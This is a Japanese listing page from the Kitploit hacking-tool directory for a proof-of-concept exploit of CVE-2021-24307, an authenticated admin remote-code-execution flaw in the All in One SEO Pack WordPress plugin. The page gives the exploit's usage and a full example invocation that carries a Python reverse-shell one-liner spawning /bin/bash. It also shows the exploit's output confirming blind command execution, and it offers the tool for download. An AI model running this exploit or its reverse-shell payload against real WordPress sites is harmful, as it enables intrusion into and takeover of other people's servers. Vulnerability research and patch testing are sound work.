Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — CVE-2021-24307の概念実証エクスプロイト。All in One SEO Pack <= 4.1.0.1における、PHPのアンシリアライズを介した認証済み管理者RCEであり、任意のコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307の概念実証エクスプロイト。All in One SEO Pack <= 4.1.0.1における、PHPのアンシリアライズを介した認証済み管理者RCEであり、任意のコマンド実行を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
4254年前未レビュー

Admin PHP unserialization RCE in All in one SEO pack (CVE-2021-24307)

AISEO <= 4.1.0.1 における、管理者認証済みRCEのシンプルなPoCです。サンプルとして提供されています。

詳細な解説はこちら: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

使用方法:

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

例:

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 管理者認証済みRCE --
-- Exploit by Vincent MICHEL (@darkpills) --

[+] wordpress http://wordpress/ への認証中
[+] WP REST API nonce の取得中
[+] Nonce が見つかりました: 6aeb9ddf05
[+] コマンド実行用のPOSTペイロードを生成中: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] インポート設定付きのiniファイルをアップロード中
[+] 完了! 結果をどこかで確認してください (ブラインドコマンド実行)
ツールをダウンロード